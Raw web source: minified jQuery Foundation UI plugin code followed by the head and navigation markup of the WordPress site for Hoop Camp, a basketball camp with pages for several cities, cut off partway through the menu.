i&&i.indexOf("tip-top")>-1?(l(r,n.offset().top-r.outerHeight()-u,"auto","auto",n.offset().left,s).removeClass("tip-override"),l(o,"auto","auto",-u,"auto")):i&&i.indexOf("tip-left")>-1?(l(r,n.offset().top+n.outerHeight()/2-u,"auto","auto",n.offset().left-r.outerWidth()-10,s).removeClass("tip-override"),l(o,r.outerHeight()/2-u/2,-u,"auto","auto")):i&&i.indexOf("tip-right")>-1?(l(r,n.offset().top+n.outerHeight()/2-u,"auto","auto",n.offset().left+n.outerWidth()+10,s).removeClass("tip-override"),l(o,r.outerHeight()/2-u/2,"auto","auto",-u)):i&&i.indexOf("tip-centered-top")>-1?(l(r,n.offset().top-r.outerHeight()-u,"auto","auto",n.offset().left+(n.outerWidth()-r.outerWidth())/2,s).removeClass("tip-override"),l(o,"auto",r.outerWidth()/2-u/2,-u,"auto")):i&&i.indexOf("tip-centered-bottom")>-1&&(l(r,n.offset().top+n.outerHeight()+10,"auto","auto",n.offset().left+(n.outerWidth()-r.outerWidth())/2,s).removeClass("tip-override"),l(o,-u,r.outerWidth()/2-u/2,"auto","auto"));r.css("visibility","visible").hide()},inheritable_classes:function(t){var n=["tip-top","tip-left","tip-bottom","tip-right","tip-centered-top","tip-centered-bottom","noradius"].concat(r.additionalInheritableClasses),i=t.attr("class"),s=i?e.map(i.split(" "),function(t,r){if(e.inArray(t,n)!==-1)return t}).join(" "):"";return e.trim(s)},show:function(e){var t=i.getTip(e);i.reposition(e,t,e.attr("class")),t.fadeIn(150)},hide:function(e){var t=i.getTip(e);t.fadeOut(150)},reload:function(){var t=e(this);return t.data("tooltips")?t.foundationTooltips("destroy").foundationTooltips("init"):t.foundationTooltips("init")},destroy:function(){return this.each(function(){e(t).off(".tooltip"),e(r.selector).off(".tooltip"),e(r.tooltipClass).each(function(t){e(e(r.selector).get(t)).attr("title",e(this).text())}).remove()})}};e.fn.foundationTooltips=function(t){if(i[t])return i[t].apply(this,Array.prototype.slice.call(arguments,1));if(typeof t=="object"||!t)return i.init.apply(this,arguments);e.error("Method "+t+" does not exist on jQuery.foundationTooltips")}})(jQuery,this); (function(e,t,n){"use strict";e.fn.foundationAccordion=function(t){var n=function(e){return e.hasClass("hover")&&!Modernizr.touch};e(document).on("mouseenter",".accordion li",function(){var t=e(this).parent();if(n(t)){var r=e(this).children(".content").first();e(".content",t).not(r).hide().parent("li").removeClass("active"),r.show(0,function(){r.parent("li").addClass("active")})}}),e(document).on("click.fndtn",".accordion li .title",function(){var t=e(this).closest("li"),r=t.parent();if(!n(r)){var i=t.children(".content").first();t.hasClass("active")?r.find("li").removeClass("active").end().find(".content").hide():(e(".content",r).not(i).hide().parent("li").removeClass("active"),i.show(0,function(){i.parent("li").addClass("active")}))}})}})(jQuery,this); /*! http://mths.be/placeholder v2.0.7 by @mathias */ (function(e,t,n){function f(e){var t={},r=/^jQuery\d+$/;return n.each(e.attributes,function(e,n){n.specified&&!r.test(n.name)&&(t[n.name]=n.value)}),t}function l(e,r){var i=this,s=n(i);if(i.value==s.attr("placeholder")&&s.hasClass("placeholder"))if(s.data("placeholder-password")){s=s.hide().next().show().attr("id",s.removeAttr("id").data("placeholder-id"));if(e===!0)return s[0].value=r;s.focus()}else i.value="",s.removeClass("placeholder"),i==t.activeElement&&i.select()}function c(){var e,t=this,r=n(t),i=r,s=this.id;if(t.value==""){if(t.type=="password"){if(!r.data("placeholder-textinput")){try{e=r.clone().attr({type:"text"})}catch(o){e=n("<input>").attr(n.extend(f(this),{type:"text"}))}e.removeAttr("name").data({"placeholder-password":!0,"placeholder-id":s}).bind("focus.placeholder",l),r.data({"placeholder-textinput":e,"placeholder-id":s}).before(e)}r=r.removeAttr("id").hide().prev().attr("id",s).show()}r.addClass("placeholder"),r[0].value=r.attr("placeholder")}else r.removeClass("placeholder")}var r="placeholder"in t.createElement("input"),i="placeholder"in t.createElement("textarea"),s=n.fn,o=n.valHooks,u,a;r&&i?(a=s.placeholder=function(){return this},a.input=a.textarea=!0):(a=s.placeholder=function(){var e=this;return e.filter((r?"textarea":":input")+"[placeholder]").not(".placeholder").bind({"focus.placeholder":l,"blur.placeholder":c}).data("placeholder-enabled",!0).trigger("blur.placeholder"),e},a.input=r,a.textarea=i,u={get:function(e){var t=n(e);return t.data("placeholder-enabled")&&t.hasClass("placeholder")?"":e.value},set:function(e,r){var i=n(e);return i.data("placeholder-enabled")?(r==""?(e.value=r,e!=t.activeElement&&c.call(e)):i.hasClass("placeholder")?l.call(e,!0,r)||(e.value=r):e.value=r,i):e.value=r}},r||(o.input=u),i||(o.textarea=u),n(function(){n(t).delegate("form","submit.placeholder",function(){var e=n(".placeholder",this).each(l);setTimeout(function(){e.each(c)},10)})}),n(e).bind("beforeunload.placeholder",function(){n(".placeholder").each(function(){this.value=""})}))})(this,document,jQuery); (function(e,t,n){"use strict";e.fn.foundationAlerts=function(t){var n=e.extend({callback:e.noop},t);e(document).on("click",".alert-box a.close",function(t){t.preventDefault(),e(this).closest(".alert-box").fadeOut(function(){e(this).remove(),n.callback()})})}})(jQuery,this); /* * jQuery Foundation Top Bar 2.0.4 * http://foundation.zurb.com * Copyright 2012, ZURB * Free to use under the MIT license. * http://www.opensource.org/licenses/mit-license.php */ /*jslint unparam: true, browser: true, indent: 2 */ (function(e,t,n){"use strict";var r={index:0,initialized:!1},i={init:function(n){return this.each(function(){r=e.extend(r,n),r.$w=e(t),r.$topbar=e("nav.top-bar"),r.$section=r.$topbar.find("section"),r.$titlebar=r.$topbar.children("ul:first");var s=e("<div class='top-bar-js-breakpoint'/>").appendTo("body");r.breakPoint=s.width(),s.remove(),r.initialized||(i.assemble(),r.initialized=!0),r.height||i.largestUL(),r.$topbar.parent().hasClass("fixed")&&e("body").css("padding-top",r.$topbar.outerHeight()),e(".top-bar .toggle-topbar").off("click.fndtn").on("click.fndtn",function(e){e.preventDefault(),i.breakpoint()&&(r.$topbar.toggleClass("expanded"),r.$topbar.css("min-height","")),r.$topbar.hasClass("expanded")||(r.$section.css({left:"0%"}),r.$section.find(">.name").css({left:"100%"}),r.$section.find("li.moved").removeClass("moved"),r.index=0)}),e(".top-bar .has-dropdown>a").off("click.fndtn").on("click.fndtn",function(t){(Modernizr.touch||i.breakpoint())&&t.preventDefault();if(i.breakpoint()){var n=e(this),s=n.closest("li");r.index+=1,s.addClass("moved"),r.$section.css({left:-(100*r.index)+"%"}),r.$section.find(">.name").css({left:100*r.index+"%"}),n.siblings("ul").height(r.height+r.$titlebar.outerHeight(!0)),r.$topbar.css("min-height",r.height+r.$titlebar.outerHeight(!0)*2)}}),e(t).on("resize.fndtn.topbar",function(){i.breakpoint()||r.$topbar.css("min-height","")}),e(".top-bar .has-dropdown .back").off("click.fndtn").on("click.fndtn",function(t){t.preventDefault();var n=e(this),i=n.closest("li.moved"),s=i.parent();r.index-=1,r.$section.css({left:-(100*r.index)+"%"}),r.$section.find(">.name").css({left:100*r.index+"%"}),r.index===0&&r.$topbar.css("min-height",0),setTimeout(function(){i.removeClass("moved")},300)})})},breakpoint:function(){return r.$w.width()<r.breakPoint},assemble:function(){r.$section.detach(),r.$section.find(".has-dropdown>a").each(function(){var t=e(this),n=t.siblings(".dropdown"),r=e('<li class="title back js-generated"><h5><a href="#"></a></h5></li>');r.find("h5>a").html(t.html()),n.prepend(r)}),r.$section.appendTo(r.$topbar)},largestUL:function(){var t=r.$topbar.find("section ul ul"),n=t.first(),i=0;t.each(function(){e(this).children("li").length>n.children("li").length&&(n=e(this))}),n.children("li").each(function(){i+=e(this).outerHeight(!0)}),r.height=i}};e.fn.foundationTopBar=function(t){if(i[t])return i[t].apply(this,Array.prototype.slice.call(arguments,1));if(typeof t=="object"||!t)return i.init.apply(this,arguments);e.error("Method "+t+" does not exist on jQuery.foundationTopBar")};if(e(".sticky").length>0){var s=e(".sticky").length?e(".sticky").offset().top:0,o=e(t);o.scroll(function(){o.scrollTop()>=s?e(".sticky").addClass("fixed"):o.scrollTop()<s&&e(".sticky").removeClass("fixed")})}})(jQuery,this); /* * jQuery Foundation Clearing 1.2.1 * http://foundation.zurb.com * Copyright 2012, ZURB * Free to use under the MIT license. * http://www.opensource.org/licenses/mit-license.php */ /*jslint unparam: true, browser: true, indent: 2 */ (function(e,t,n,r){"use strict";var i={templates:{viewing:'<a href="#" class="clearing-close">&times;</a><div class="visible-img" style="display: none"><img src="#"><p class="clearing-caption"></p><a href="#" class="clearing-main-left"></a><a href="#" class="clearing-main-right"></a></div>'},close_selectors:"a.clearing-close",initialized:!1,locked:!1},s={init:function(t,r){return this.find("ul[data-clearing]").each(function(){var t=e(n),r=e(this),o=o||{},u=u||{},a=r.data("fndtn.clearing.settings");a||(o.$parent=r.parent(),r.data("fndtn.clearing.settings",e.extend({},i,o)),s.assemble(r.find("li")),i.initialized||(s.events(r),Modernizr.touch&&s.swipe_events()))})},events:function(r){var o=r.data("fndtn.clearing.settings");e(n).on("click.fndtn.clearing","ul[data-clearing] li",function(t,n,r){var n=n||e(this),r=r||n,i=n.parent().data("fndtn.clearing.settings");t.preventDefault(),i||n.parent().foundationClearing(),s.open(e(t.target),n,r),s.update_paddles(r)}).on("click.fndtn.clearing",".clearing-main-right",function(e){s.nav(e,"next")}).on("click.fndtn.clearing",".clearing-main-left",function(e){s.nav(e,"prev")}).on("click.fndtn.clearing",o.close_selectors,this.close).on("keydown.fndtn.clearing",this.keydown),e(t).on("resize.fndtn.clearing",this.resize),i.initialized=!0},swipe_events:function(){e(n).bind("swipeleft","ul[data-clearing]",function(e){s.nav(e,"next")}).bind("swiperight","ul[data-clearing]",function(e){s.nav(e,"prev")}).bind("movestart","ul[data-clearing]",function(e){(e.distX>e.distY&&e.distX<-e.distY||e.distX<e.distY&&e.distX>-e.distY)&&e.preventDefault()})},assemble:function(e){var t=e.parent(),n=t.data("fndtn.clearing.settings"),r=t.detach(),i={grid:'<div class="carousel">'+this.outerHTML(r[0])+"</div>",viewing:n.templates.viewing},s='<div class="clearing-assembled"><div>'+i.viewing+i.grid+"</div></div>";return n.$parent.append(s)},open:function(e,t,n){var r=n.closest(".clearing-assembled"),i=r.find("div:first"),o=i.find(".visible-img"),u=o.find("img").not(e);s.locked()||(u.attr("src",this.load(e)),u.loaded(function(){r.addClass("clearing-blackout"),i.addClass("clearing-container"),this.caption(o.find(".clearing-caption"),e),o.show(),this.fix_height(n),this.center(u),this.shift(t,n,function(){n.siblings().removeClass("visible"),n.addClass("visible")})}.bind(this)))},close:function(t){t.preventDefault();var n=function(e){return/blackout/.test(e.selector)?e:e.closest(".clearing-blackout")}(e(this)),r,s;return this===t.target&&n&&(r=n.find("div:first"),s=r.find(".visible-img"),i.prev_index=0,n.find("ul[data-clearing]").attr("style",""),n.removeClass("clearing-blackout"),r.removeClass("clearing-container"),s.hide()),!1},keydown:function(t){var n=e(".clearing-blackout").find("ul[data-clearing]");t.which===39&&s.go(n,"next"),t.which===37&&s.go(n,"prev"),t.which===27&&e("a.clearing-close").trigger("click")},nav:function(t,n){var r=e(".clearing-blackout").find("ul[data-clearing]");t.preventDefault(),this.go(r,n)},resize:function(){var t=e(".clearing-blackout .visible-img").find("img");t.length>0&&s.center(t)},fix_height:function(t){var n=t.siblings();n.each(function(){var t=e(this),n=t.find("img");t.height()>n.outerHeight()&&t.addClass("fix-height")}).closest("ul").width(n.length*100+"%")},update_paddles:function(e){var t=e.closest(".carousel").siblings(".visible-img");e.next().length>0?t.find(".clearing-main-right").removeClass("disabled"):t.find(".clearing-main-right").addClass("disabled"),e.prev().length>0?t.find(".clearing-main-left").removeClass("disabled"):t.find(".clearing-main-left").addClass("disabled")},load:function(e){var t=e.parent().attr("href");return this.preload(e),t?t:e.attr("src")},preload:function(e){this.img(e.closest("li").next()),this.img(e.closest("li").prev())},img:function(e){if(e.length>0){var t=new Image,n=e.find("a");n.length>0?t.src=n.attr("href"):t.src=e.find("img").attr("src")}},caption:function(e,t){var n=t.data("caption");n?e.text(n).show():e.text("").hide()},go:function(e,t){var n=e.find(".visible"),r=n[t]();r.length>0&&r.find("img").trigger("click",[n,r])},shift:function(e,t,n){var r=t.parent(),s=i.prev_index,o=this.direction(r,e,t),u=parseInt(r.css("left"),10),a=t.outerWidth(),f;t.index()!==s&&!/skip/.test(o)?/left/.test(o)?(this.lock(),r.animate({left:u+a},300,this.unlock)):/right/.test(o)&&(this.lock(),r.animate({left:u-a},300,this.unlock)):/skip/.test(o)&&(f=t.index()-i.up_count,this.lock(),f>0?r.animate({left:-(f*a)},300,this.unlock):r.animate({left:0},300,this.unlock)),n()},lock:function(){i.locked=!0},unlock:function(){i.locked=!1},locked:function(){return i.locked},direction:function(t,n,r){var s=t.find("li"),o=s.outerWidth()+s.outerWidth()/4,u=Math.floor(e(".clearing-container").outerWidth()/o)-1,a=s.index(r),f;return i.up_count=u,this.adjacent(i.prev_index,a)?a>u&&a>i.prev_index?f="right":a>u-1&&a<=i.prev_index?f="left":f=!1:f="skip",i.prev_index=a,f},adjacent:function(e,t){for(var n=t+1;n>=t-1;n--)if(n===e)return!0;return!1},center:function(e){e.css({marginLeft:-(e.outerWidth()/2),marginTop:-(e.outerHeight()/2)})},outerHTML:function(e){return e.outerHTML||(new XMLSerializer).serializeToString(e)}};e.fn.foundationClearing=function(t){if(s[t])return s[t].apply(this,Array.prototype.slice.call(arguments,1));if(typeof t=="object"||!t)return s.init.apply(this,arguments);e.error("Method "+t+" does not exist on jQuery.foundationClearing")},function(e){e.fn.loaded=function(t,n){function o(){s-=1,!s&&t()}function u(){this.one("load",o);if(e.browser.msie){var t=this.attr("src"),n=t.match(/\?/)?"&":"?";n+=r.cachePrefix+"="+(new Date).getTime(),this.attr("src",t+n)}}var r=e.extend({},e.fn.loaded.defaults,n),i=this.find("img").add(this.filter("img")),s=i.length;return i.each(function(){var t=e(this);if(!t.attr("src")){o();return}this.complete||this.readyState===4?o():u.call(t)})},e.fn.loaded.defaults={cachePrefix:"random"}}(jQuery)})(jQuery,this,this.document);
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel="pingback" href="https://www.hoop.camp/xmlrpc.php" /> <script type="text/javascript"> document.documentElement.className = 'js'; </script> <script>var et_site_url='https://www.hoop.camp';var et_post_id='156';function et_core_page_resource_fallback(a,b){"undefined"===typeof b&&(b=a.sheet.cssRules&&0===a.sheet.cssRules.length);b&&(a.onerror=null,a.onload=null,a.href?a.href=et_site_url+"/?et_core_page_resource="+a.id+et_post_id:a.src&&(a.src=et_site_url+"/?et_core_page_resource="+a.id+et_post_id))} </script><title>Join the Hoop Camp Movement | Hoop Camp</title> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Join the Hoop Camp Movement &raquo; Feed" href="https://www.hoop.camp/feed/" /> <link rel="alternate" type="application/rss+xml" title="Join the Hoop Camp Movement &raquo; Comments Feed" href="https://www.hoop.camp/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.hoop.camp\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <meta content="Divi v.3.21.4" name="generator"/><style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.hoop.camp/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='divi-style-css' href='https://www.hoop.camp/wp-content/themes/Divi/style.css?ver=3.21.4' type='text/css' media='all' /> <link rel='stylesheet' id='et-builder-googlefonts-cached-css' href='https://fonts.googleapis.com/css?family=Oswald%3A200%2C300%2Cregular%2C500%2C600%2C700%7COxygen%3A300%2Cregular%2C700%7CLato%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C700%2C700italic%2C900%2C900italic%7CNixie+One%3Aregular%7CMontserrat%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&#038;ver=5.1.1#038;subset=latin,latin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://www.hoop.camp/wp-includes/css/dashicons.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='dcgd-style-css' href='https://www.hoop.camp/wp-content/plugins/gravitydivi-forms-customizer-module/includes/dcgd-style.css?ver=5.1.1' type='text/css' media='all' /> <script type='text/javascript' src='https://www.hoop.camp/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.hoop.camp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='https://www.hoop.camp/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.hoop.camp/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.hoop.camp/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel="canonical" href="https://www.hoop.camp/" /> <link rel='shortlink' href='https://www.hoop.camp/' /> <link rel="alternate" type="application/json+oembed" href="https://www.hoop.camp/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hoop.camp%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.hoop.camp/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hoop.camp%2F&#038;format=xml" /> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//www.hoop.camp/?wordfence_lh=1&hid=F4F36AD01593AC810F17671657302866'); </script><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <script type="text/javascript"> jQuery(document).ready(function($) { $('.gfield_description').each(function(i,e){ fielddesc = $('<div>').append($(e).clone()).remove().html(); $(e).siblings('label.gfield_label').after(fielddesc); $(e).remove(); }); }); </script><link rel="icon" href="https://www.hoop.camp/wp-content/uploads/2018/05/cropped-Hoop-camp-logo-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.hoop.camp/wp-content/uploads/2018/05/cropped-Hoop-camp-logo-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.hoop.camp/wp-content/uploads/2018/05/cropped-Hoop-camp-logo-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.hoop.camp/wp-content/uploads/2018/05/cropped-Hoop-camp-logo-270x270.png" /> <!-- BEGIN ExactMetrics v5.3.7 Universal Analytics - https://exactmetrics.com/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-41119336-27', 'auto'); ga('send', 'pageview'); </script> <!-- END ExactMetrics Universal Analytics --> <link rel="stylesheet" id="et-core-unified-cached-inline-styles" href="https://www.hoop.camp/wp-content/cache/et/156/et-core-unified-15577520353189.min.css" onerror="et_core_page_resource_fallback(this, true)" onload="et_core_page_resource_fallback(this)" /></head> <body data-rsssl=1 class="home page-template-default page page-id-156 et_pb_button_helper_class et_fixed_nav et_show_nav et_cover_background et_secondary_nav_enabled et_secondary_nav_only_menu et_pb_gutter windows et_pb_gutters3 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns4 et_header_style_centered et_pb_pagebuilder_layout et_right_sidebar et_divi_theme et-db et_minified_js et_minified_css"> <div id="page-container"> <div id="top-header"> <div class="container clearfix"> <div id="et-secondary-menu"> <ul id="et-secondary-nav" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-156 current_page_item menu-item-170"><a href="https://www.hoop.camp/" aria-current="page">Home</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-215768"><a href="#">Locations</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-215769"><a href="https://www.hoop.camp/anchorage/">Anchorage</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-215770"><a href="https://www.hoop.camp/china/">China</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-215771"><a href="https://www.hoop.camp/miami/">Miami</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-215772"><a href="https://www.hoop.camp/minneapolis/">Minneapolis</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-215773"><a href="https://www.hoop.camp/phoenix/">Phoenix</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-215774"><a href="https://www.hoop.camp/pocatello/">Pocatello</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-215775"><a href="https://www.hoop.camp/portland/">Portland</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-215776"><a href="https://www.hoop.camp/puertovallarta/">Puerto Vallarta</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-215777"><a href="https://www.hoop.camp/saltlake/">Salt Lake City</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-172"><a href="https://www.hoop.camp/about/">About Us</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-214979"><a href="https://www.hoop.camp/get-involved/">Get Involved</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-214980"><a href="https://www.hoop.camp/donate/">Donate</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-171"><a href="https://www.hoop.camp/contact/">Contact Us</a></li> </ul> </div> <!-- #et-secondary-menu --> </div> <!-- .container --> </div> <!-- #top-header --> <header id="main-header" data-height-onload="66"> <div class="container clearfix et_menu_container"> <div class="logo_container"> <span class="logo_helper"></span> <a href="https://www.hoop.camp/"> <img src="https://www.hoop.camp/wp-content/themes/Divi/images/logo.png" alt="Join the Hoop Camp Movement" id="logo" data-height-percentage="54" /> </a> </div> <div id="et-top-navigation" data-height="66" data-fixed-height="40"> <nav id="top-menu-nav"> <ul id="top-menu" class="nav"> <li ><a href="https://www.hoop.camp/">Home</a></li> <li class="page_item page-item-2"><a href="https://www.hoop.camp/about/">About Us</a></li> <li class="page_item page-item-215204 page_item_has_children"><a href="https://www.hoop.camp/anchorage/">Anchorage</a> <ul class='children'> <li class="page_item page-item-215205"><a href="https://www.hoop.camp/anchorage/camp-information/">Camp Information</a></li> <li class="page_item page-item-215206"><a href="https://www.hoop.camp/anchorage/gallery/">Gallery</a></li> <li class="page_item page-item-215208"><a href="https://www.hoop.camp/anchorage/registration/">Registration</a></li> <li class="page_item page-item-215207"><a href="https://www.hoop.camp/anchorage/registration-success/">Registration Success</a></li> </ul> </li> <li class="page_item page-item-164"><a href="https://www.hoop.camp/blog/">Blog</a></li> <li class="page_item page-item-215666 page_item_has_children"><a href="https://www.hoop.camp/china/">China</a> <ul class='children'> <li class="page_item page-item-215668"><a href="https://www.hoop.camp/china/camp-information/">Camp Information</a></li> <li class="page_item page-item-215670"><a href="https://www.hoop.camp/china/gallery/">Gallery</a></li> <li class="page_item page-item-215672"><a href="https://www.hoop.camp/china/registration/">Registration</a></li> <li class="page_item page-item-215687"><a href="https://www.hoop.camp/china/registration-success/">Registration Success</a></li> </ul> </li> <li class="page_item page-item-19"><a href="https://www.hoop.camp/contact/">Contact Us</a></li> <li class="page_item page-item-214975"><a href="https://www.hoop.camp/donate/">Donate</a></li> <li class="page_item page-item-214977"><a href="https://www.hoop.camp/get-involved/">Get Involved</a></li> <li class="page_item page-item-156 current_page_item"><a href="https://www.hoop.camp/" aria-current="page">Home</a></li> <li class="page_item page-item-215716 page_item_has_children"><a href="https://www.hoop.camp/miami/">Miami</a> <ul class='children'> <li class="page_item page-item-215718"><a href="https://www.hoop.camp/miami/camp-information/">Camp Information</a></li> <li class="page_item page-item-215720"><a href="https://www.hoop.camp/miami/gallery/">Gallery</a></li> <li class="page_item page-item-215722"><a href="https://www.hoop.camp/miami/registration/">Registration</a></li> <li class="page_item page-item-215724"><a href="https://www.hoop.camp/miami/registration-success/">Registration Success</a></li> </ul> </li> <li class="page_item page-item-215695 page_item_has_children"><a href="https://www.hoop.camp/minneapolis/">Minneapolis</a> <ul class='children'> <li class="page_item page-item-215697"><a href="https://www.hoop.camp/minneapolis/camp-information/">Camp Information</a></li> <li class="page_item page-item-215699"><a href="https://www.hoop.camp/minneapolis/gallery/">Gallery</a></li> <li class="page_item page-item-215701"><a href="https://www.hoop.camp/minneapolis/registration/">Registration</a></li> <li class="page_item page-item-215703"><a href="https://www.hoop.camp/minneapolis/registration-success/">Registration Success</a></li> </ul> </li> <li class="page_item page-item-215607 page_item_has_children"><a href="https://www.hoop.camp/phoenix/">Phoenix</a> <ul class='children'> <li class="page_item page-item-215609"><a href="https://www.hoop.camp/phoenix/camp-information/">Camp Information</a></li> <li class="page_item page-item-215613"><a href="https://www.hoop.camp/phoenix/gallery/">Gallery</a></li> <li class="page_item page-item-215615"><a href="https://www.hoop.camp/phoenix/registration/">Registration</a></li> <li class="page_item page-item-215617"><a href="https://www.hoop.camp/phoenix/registration-success/">Registration Success</a></li> </ul> </li> <li class="page_item page-item-214963 page_item_has_children"><a href="https://www.hoop.camp/pocatello/">Pocatello</a> <ul class='children'> <li class="page_item page-item-214971"><a href="https://www.hoop.camp/pocatello/camp-information-pocatello/">Camp Information: Pocatello</a></li> <li class="page_item page-item-214973"><a href="https://www.hoop.camp/pocatello/gallery-pocatello/">Gallery: Pocatello</a></li> <li class="page_item page-item-215171"><a href="https://www.hoop.camp/pocatello/registration-success/">Registration Success</a></li> <li class="page_item page-item-214969"><a href="https://www.hoop.camp/pocatello/registration-pocatello/">Registration: Pocatello</a></li> </ul> </li> <li class="page_item page-item-215337 page_item_has_children"><a href="https://www.hoop.camp/portland/">Portland</a> <ul class='children'> <li class="page_item page-item-215338"><a href="https://www.hoop.camp/portland/camp-information/">Camp Information</a></li> <li class="page_item page-item-215532"><a href="https://www.hoop.camp/portland/free_osu_clinic/">Free OSU Clinic</a></li> <li class="page_item page-item-215522"><a href="https://www.hoop.camp/portland/free_psu_clinic/">Free PSU Clinic</a></li> <li class="page_item page-item-215339"><a href="https://www.hoop.camp/portland/gallery/">Gallery</a></li> <li class="page_item page-item-223192"><a 